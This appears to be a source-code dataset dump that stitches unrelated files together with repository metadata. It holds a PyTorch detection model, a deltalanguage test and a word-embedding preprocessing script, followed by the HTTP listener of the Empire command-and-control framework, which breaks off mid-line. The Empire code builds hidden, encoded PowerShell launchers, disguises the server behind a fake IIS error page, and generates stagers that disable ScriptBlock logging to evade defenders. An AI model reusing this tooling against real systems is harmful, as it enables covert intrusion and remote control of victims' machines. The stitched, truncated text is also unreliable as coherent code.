import torch from torch import nn from openpose.structures.image_list import to_image_list from ..backbone import build_backbone from ..rpn.rpn import build_rpn from ..roi_heads.roi_heads import build_roi_heads class GeneralizedRCNN(nn.Module): def __init__(self, cfg): super(GeneralizedRCNN, self).__init__() self.backbone = build_backbone(cfg) self.rpn = build_rpn(cfg, self.backbone.out_channels) self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels) def forward(self, images, targets=None): if self.training and targets is None: raise ValueError("In training mode, targets should be passed") images = to_image_list(images) features = self.backbone(images.tensors) proposals, proposal_losses = self.rpn(images, features, targets) if self.roi_heads: x, result, detector_losses = self.roi_heads(features, proposals, targets) else: x = features result = proposals detector_losses = {} if self.training: losses = {} losses.update(detector_losses) losses.update(proposal_losses) return losses,result return result
true
true
f705cb12d2f7098d80c81f26b124cf8f7a03cf9a
1,441
py
Python
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
16
2021-01-06T17:44:51.000Z
2022-01-06T12:07:07.000Z
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
null
null
null
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
4
2021-03-25T20:35:08.000Z
2021-09-06T13:10:58.000Z
"""Test DeltaPySimulator functionality pre-execution.""" import unittest import deltalanguage as dl from deltalanguage.test._graph_lib import (getg_const_chain, getg_optional_queues) class DeltaQueueCreationTest(unittest.TestCase): """Test that the simulator creates queues properly.""" def test_queue_types(self): """Test that queues of correct types are created (or not) depending on the type of the source and destination nodes. """ graph = getg_const_chain() dl.DeltaPySimulator(graph) self.assertEqual(len(graph.nodes[0].out_queues), 0) self.assertEqual(len(graph.nodes[1].out_queues), 1) self.assertEqual(len(graph.nodes[2].out_queues), 1) self.assertEqual(type(graph.nodes[1].out_queues['output']), dl.runtime.ConstQueue) self.assertEqual(type(graph.nodes[2].out_queues['output']), dl.runtime.DeltaQueue) def test_queue_optionality(self): """Test that queues inhere correct optionality depending on the type of the destination node. """ graph = getg_optional_queues() dl.DeltaPySimulator(graph) self.assertEqual(graph.nodes[0].out_queues['output'].optional, True) self.assertEqual(graph.nodes[1].out_queues['output'].optional, False) if __name__ == "__main__": unittest.main()
33.511628
79
0.651631
import unittest import deltalanguage as dl from deltalanguage.test._graph_lib import (getg_const_chain, getg_optional_queues) class DeltaQueueCreationTest(unittest.TestCase): def test_queue_types(self): graph = getg_const_chain() dl.DeltaPySimulator(graph) self.assertEqual(len(graph.nodes[0].out_queues), 0) self.assertEqual(len(graph.nodes[1].out_queues), 1) self.assertEqual(len(graph.nodes[2].out_queues), 1) self.assertEqual(type(graph.nodes[1].out_queues['output']), dl.runtime.ConstQueue) self.assertEqual(type(graph.nodes[2].out_queues['output']), dl.runtime.DeltaQueue) def test_queue_optionality(self): graph = getg_optional_queues() dl.DeltaPySimulator(graph) self.assertEqual(graph.nodes[0].out_queues['output'].optional, True) self.assertEqual(graph.nodes[1].out_queues['output'].optional, False) if __name__ == "__main__": unittest.main()
true
true
f705cc3c3ee5b9fb1d0983e8eed642f662f1aec3
11,417
py
Python
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
9
2016-12-19T17:16:34.000Z
2020-11-02T12:32:14.000Z
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
1
2018-07-04T11:07:31.000Z
2018-07-04T11:07:31.000Z
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
3
2017-04-26T16:49:25.000Z
2020-02-26T12:31:05.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Program to preprocess training and test data using word2vec, dep2vec and fact2vec embeddings and prepare corresponding weight vectors to be used in CNN Copyright (C) 2016 Ubiquitous Knowledge Processing (UKP) Lab Technische Universität Darmstadt Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import cPickle from collections import defaultdict import sys, re import pandas as pd def preprocess_data(corpus): """ Process the training and test data usable for training """ claims = [] #trainset exp_file = corpus[0] nonexp_file = corpus[1] unv_file = corpus[2] #test set exp_file1 = corpus[3] nonexp_file1 = corpus[4] unv_file1 = corpus[5] vocab = defaultdict(float) with open(exp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) #print rev words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(nonexp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(unv_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for 
word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(exp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(nonexp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(unv_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) return claims, vocab def get_W(word_vecs, k=300): """ Get word matrix. 
W[i] is the vector for word indexed by i """ vocab_size = len(word_vecs) word_idx_map = dict() W = np.zeros(shape=(vocab_size+1, k)) W[0] = np.zeros(k) i = 1 for word in word_vecs: W[i] = word_vecs[word] word_idx_map[word] = i i += 1 return W, word_idx_map def load_bin_vec(fname, vocab): """ Loads 300x1 word vecs from Google (Mikolov) word2vec """ word_vecs = {} with open(fname, "rb") as f: header = f.readline() vocab_size, layer1_size = map(int, header.split()) binary_len = np.dtype('float32').itemsize * layer1_size for line in xrange(vocab_size): word = [] while True: ch = f.read(1) if ch == ' ': word = ''.join(word) break if ch != '\n': word.append(ch) if word in vocab: wvector = np.fromstring(f.read(binary_len), dtype='float32') word_vecs[word] = wvector[0:300] #print "wordvec", word_vecs[word] else: f.read(binary_len) return word_vecs def load_levy_vec(fname, vocab, k): #deps.words is a dependency word embeddings from Omer levy work word_vecs = {} with open(fname, "rb") as f: for line in f: wordvector = line.strip().split(' ') word = wordvector[0] #print ('word vector',word,wordvector) del wordvector[0] if word in vocab: vec = np.array(wordvector, dtype='float32') word_vecs[word]=vec[0:k] return word_vecs def add_unknown_words(word_vecs, vocab, min_df=1, k=300): """ For words that occur in at least min_df documents, create a separate word vector. 
0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones """ for word in vocab: if word not in word_vecs and vocab[word] >= min_df: word_vecs[word] = np.random.uniform(-0.25,0.25,k) def clean_str(string): """ Tokenization/string cleaning for dataset """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() if __name__=="__main__": w2v_file = sys.argv[1] d2v_file = sys.argv[2] f2v_file = sys.argv[3] data_folder = ["../data/data_verifiable_unverifiable/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/test_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/test_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/test_data/verify_unv/unverify.txt"] #train and dev splits #data_folder = 
["../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_unv/unverify.txt"] print "loading data..." claims, vocab = preprocess_data(data_folder) max_l = np.max(pd.DataFrame(claims)["num_words"]) print "data loaded!" print "number of sentences: " + str(len(claims)) print "vocab size: " + str(len(vocab)) print "max sentence length: " + str(max_l) #loading word2vec embeddings print "loading word2vec vectors...", w2v = load_bin_vec(w2v_file, vocab) print "word2vec loaded!" print "num words already in word2vec: " + str(len(w2v)) #load omerlevy word embeddings print "loading dependency word2vec vectors...", d2v = load_levy_vec(d2v_file, vocab, 300) print "dep2vec loaded!" print "num words already in dep2vec: " + str(len(d2v)) #loading factual embeddings print "loading fact2vec vectors...", f2v = load_bin_vec(f2v_file, vocab) print "fact2vec loaded!" 
print "num words already in fact2vec: " + str(len(f2v)) #Add distributions for unseen words in w2v add_unknown_words(w2v, vocab) # get weight vector using w2v W_w2v, word_idx_map_w2v = get_W(w2v) #Add distributions for unseen words in d2v add_unknown_words(d2v, vocab) # get weight vector using d2v W_d2v, word_idx_map_d2v = get_W(d2v) #Add distributions for unseen words in f2v add_unknown_words(f2v, vocab) # get weight vector using f2v W_f2v, word_idx_map_f2v = get_W(f2v) #random vectors and weights rand_vecs = {} add_unknown_words(rand_vecs, vocab) W2, _ = get_W(rand_vecs) # consider 100 dimensions from each embeddings to form 300 dimnesion stacked embedding vector k = 100 #concatenated embeddings - word2vec, de2vec, fact2vec embeddings cvecs = {} #concatenate all vectors into final vector for voc in w2v: if voc in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:k],d2v[voc][0:k],f2v[voc][0:k]]) elif voc not in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],f2v[voc][0:k]]) elif voc in d2v and voc not in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],d2v[voc][0:k]]) else: cvecs[voc] = w2v[voc] #Add distributions for unseen words in cvecs add_unknown_words(cvecs, vocab) # get weight vector using cvecs W_concat, word_idx_map_concat = get_W(cvecs) cPickle.dump([claims, W_w2v, W2, word_idx_map_w2v, vocab, max_l], open("claims_verify_word2vec.p", "wb")) cPickle.dump([claims, W_d2v, W2, word_idx_map_d2v, vocab, max_l], open("claims_verify_dep2vec.p", "wb")) cPickle.dump([claims, W_f2v, W2, word_idx_map_f2v, vocab, max_l], open("claims_verify_fact2vec.p", "wb")) cPickle.dump([claims, W_concat, W2, word_idx_map_concat, vocab, max_l], open("claims_verify_concat.p", "wb")) print ("word2vec, dep2vec, fact2vec, stacked pickle datasets are created!")
35.346749
568
0.581852
""" Program to preprocess training and test data using word2vec, dep2vec and fact2vec embeddings and prepare corresponding weight vectors to be used in CNN Copyright (C) 2016 Ubiquitous Knowledge Processing (UKP) Lab Technische Universität Darmstadt Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import cPickle from collections import defaultdict import sys, re import pandas as pd def preprocess_data(corpus): """ Process the training and test data usable for training """ claims = [] exp_file = corpus[0] nonexp_file = corpus[1] unv_file = corpus[2] exp_file1 = corpus[3] nonexp_file1 = corpus[4] unv_file1 = corpus[5] vocab = defaultdict(float) with open(exp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(nonexp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(unv_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, 
"num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(exp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(nonexp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(unv_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) return claims, vocab def get_W(word_vecs, k=300): """ Get word matrix. 
W[i] is the vector for word indexed by i """ vocab_size = len(word_vecs) word_idx_map = dict() W = np.zeros(shape=(vocab_size+1, k)) W[0] = np.zeros(k) i = 1 for word in word_vecs: W[i] = word_vecs[word] word_idx_map[word] = i i += 1 return W, word_idx_map def load_bin_vec(fname, vocab): """ Loads 300x1 word vecs from Google (Mikolov) word2vec """ word_vecs = {} with open(fname, "rb") as f: header = f.readline() vocab_size, layer1_size = map(int, header.split()) binary_len = np.dtype('float32').itemsize * layer1_size for line in xrange(vocab_size): word = [] while True: ch = f.read(1) if ch == ' ': word = ''.join(word) break if ch != '\n': word.append(ch) if word in vocab: wvector = np.fromstring(f.read(binary_len), dtype='float32') word_vecs[word] = wvector[0:300] else: f.read(binary_len) return word_vecs def load_levy_vec(fname, vocab, k): word_vecs = {} with open(fname, "rb") as f: for line in f: wordvector = line.strip().split(' ') word = wordvector[0] del wordvector[0] if word in vocab: vec = np.array(wordvector, dtype='float32') word_vecs[word]=vec[0:k] return word_vecs def add_unknown_words(word_vecs, vocab, min_df=1, k=300): """ For words that occur in at least min_df documents, create a separate word vector. 0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones """ for word in vocab: if word not in word_vecs and vocab[word] >= min_df: word_vecs[word] = np.random.uniform(-0.25,0.25,k) def clean_str(string): """ Tokenization/string cleaning for dataset """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! 
", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() if __name__=="__main__": w2v_file = sys.argv[1] d2v_file = sys.argv[2] f2v_file = sys.argv[3] data_folder = ["../data/data_verifiable_unverifiable/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/test_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/test_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/test_data/verify_unv/unverify.txt"] #train and dev splits #data_folder = ["../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_unv/unverify.txt"] print "loading data..." claims, vocab = preprocess_data(data_folder) max_l = np.max(pd.DataFrame(claims)["num_words"]) print "data loaded!" print "number of sentences: " + str(len(claims)) print "vocab size: " + str(len(vocab)) print "max sentence length: " + str(max_l) #loading word2vec embeddings print "loading word2vec vectors...", w2v = load_bin_vec(w2v_file, vocab) print "word2vec loaded!" print "num words already in word2vec: " + str(len(w2v)) #load omerlevy word embeddings print "loading dependency word2vec vectors...", d2v = load_levy_vec(d2v_file, vocab, 300) print "dep2vec loaded!" 
print "num words already in dep2vec: " + str(len(d2v)) #loading factual embeddings print "loading fact2vec vectors...", f2v = load_bin_vec(f2v_file, vocab) print "fact2vec loaded!" print "num words already in fact2vec: " + str(len(f2v)) #Add distributions for unseen words in w2v add_unknown_words(w2v, vocab) # get weight vector using w2v W_w2v, word_idx_map_w2v = get_W(w2v) #Add distributions for unseen words in d2v add_unknown_words(d2v, vocab) # get weight vector using d2v W_d2v, word_idx_map_d2v = get_W(d2v) #Add distributions for unseen words in f2v add_unknown_words(f2v, vocab) # get weight vector using f2v W_f2v, word_idx_map_f2v = get_W(f2v) #random vectors and weights rand_vecs = {} add_unknown_words(rand_vecs, vocab) W2, _ = get_W(rand_vecs) # consider 100 dimensions from each embeddings to form 300 dimnesion stacked embedding vector k = 100 #concatenated embeddings - word2vec, de2vec, fact2vec embeddings cvecs = {} #concatenate all vectors into final vector for voc in w2v: if voc in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:k],d2v[voc][0:k],f2v[voc][0:k]]) elif voc not in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],f2v[voc][0:k]]) elif voc in d2v and voc not in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],d2v[voc][0:k]]) else: cvecs[voc] = w2v[voc] #Add distributions for unseen words in cvecs add_unknown_words(cvecs, vocab) # get weight vector using cvecs W_concat, word_idx_map_concat = get_W(cvecs) cPickle.dump([claims, W_w2v, W2, word_idx_map_w2v, vocab, max_l], open("claims_verify_word2vec.p", "wb")) cPickle.dump([claims, W_d2v, W2, word_idx_map_d2v, vocab, max_l], open("claims_verify_dep2vec.p", "wb")) cPickle.dump([claims, W_f2v, W2, word_idx_map_f2v, vocab, max_l], open("claims_verify_fact2vec.p", "wb")) cPickle.dump([claims, W_concat, W2, word_idx_map_concat, vocab, max_l], open("claims_verify_concat.p", "wb")) print ("word2vec, dep2vec, fact2vec, stacked pickle datasets are created!")
false
true
f705cca2c11cb0eec1833939de1b8673fc58b816
62,891
py
Python
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
import logging import base64 import sys import random import string import os import ssl import time import copy import json import sys from pydispatch import dispatcher from flask import Flask, request, make_response, send_from_directory # Empire imports from lib.common import helpers from lib.common import agents from lib.common import encryption from lib.common import packets from lib.common import messages from lib.common import templating from lib.common import obfuscation class Listener: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'HTTP[S]', 'Author': ['@harmj0y'], 'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'), 'Category' : ('client_server'), 'Comments': [] } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Name' : { 'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http' }, 'Host' : { 'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s" % (helpers.lhost()) }, 'BindIP' : { 'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0' }, 'Port' : { 'Description' : 'Port for the listener.', 'Required' : True, 'Value' : '' }, 'Launcher' : { 'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'POWerShell.EXe -wIndO 1 -stA -noPrO -enc ' }, 'StagingKey' : { 'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa' }, 'DefaultDelay' : { 'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5 }, 'DefaultJitter' : { 'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0 }, 'DefaultLostLimit' : { 'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60 }, 'DefaultProfile' : { 'Description' : 'Default communication profile 
for the agent.', 'Required' : True, 'Value' : "/blog/,/wp-admin/login/,/brewery/,/shop?q=2341fdsar3qqa,/wp-content/plugins/square-sync/square-sync.css?ver=0.1,/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.5.3|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate" }, 'CertPath' : { 'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : '' }, 'KillDate' : { 'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : '' }, 'WorkingHours' : { 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' }, 'Headers' : { 'Description' : 'Headers for the control server.', 'Required' : True, 'Value' : 'Server:Microsoft-IIS/10' }, 'Cookie' : { 'Description' : 'Custom Cookie Name', 'Required' : False, 'Value' : '' }, 'StagerURI' : { 'Description' : 'URI for the stager. Must use /download/. 
Example: /download/stager.php', 'Required' : False, 'Value' : '/download/wp-content/uploads/brewery.svg' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'SlackToken' : { 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : '' }, 'SlackChannel' : { 'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general' } } # required: self.mainMenu = mainMenu self.threads = {} # optional/specific for this module self.app = None self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] # set the default staging key to the controller db default self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0]) # randomize the length of the default_response and index_page headers to evade signature based scans self.header_offset = random.randint(0, 64) self.session_cookie = '' # check if the current session cookie not empty and then generate random cookie if self.session_cookie == '': self.options['Cookie']['Value'] = self.generate_cookie() def default_response(self): """ Returns an IIS 7.5 404 not found page. 
""" return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>', '<title>404 - File or directory not found.</title>', '<style type="text/css">', '<!--', 'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}', 'fieldset{padding:0 15px 10px 15px;}', 'h1{font-size:2.4em;margin:0;color:#FFF;}', 'h2{font-size:1.7em;margin:0;color:#CC0000;}', 'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}', '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;', 'background-color:#555555;}', '#content{margin:0 0 0 2%;position:relative;}', '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}', '-->', '</style>', '</head>', '<body>', '<div id="header"><h1>Server Error</h1></div>', '<div id="content">', ' <div class="content-container"><fieldset>', ' <h2>404 - File or directory not found.</h2>', ' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>', ' </fieldset></div>', '</div>', '</body>', '</html>', ' ' * self.header_offset, # randomize the length of the header to evade signature based detection ]) def index_page(self): """ Returns a default HTTP server page. 
""" return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />', '<title>IIS7</title>', '<style type="text/css">', '<!--', 'body {', ' color:#000000;', ' background-color:#B3B3B3;', ' margin:0;', '}', '', '#container {', ' margin-left:auto;', ' margin-right:auto;', ' text-align:center;', ' }', '', 'a img {', ' border:none;', '}', '', '-->', '</style>', '</head>', '<body>', '<div id="container">', '<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>', '</div>', '</body>', '</html>', ]) def validate_options(self): """ Validate all options for this listener. """ self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] for key in self.options: if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''): print helpers.color("[!] Option \"%s\" is required." % (key)) return False # If we've selected an HTTPS listener without specifying CertPath, let us know. if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '': print helpers.color("[!] HTTPS selected but no CertPath specified.") return False return True def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): """ Generate a basic launcher for the specified listener. """ if not language: print helpers.color('[!] 
listeners/http generate_launcher(): no language specified!') if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options'] host = listenerOptions['Host']['Value'] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] profile = listenerOptions['DefaultProfile']['Value'] uris = [a for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) customHeaders = profile.split('|')[2:] cookie = listenerOptions['Cookie']['Value'] # generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners if cookie == '': generate = self.generate_cookie() listenerOptions['Cookie']['Value'] = generate cookie = generate if language.startswith('po'): # PowerShell stager = '$ErrorActionPreference = \"SilentlyContinue\";' if safeChecks.lower() == 'true': stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") # ScriptBlock Logging bypass stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" stager += 
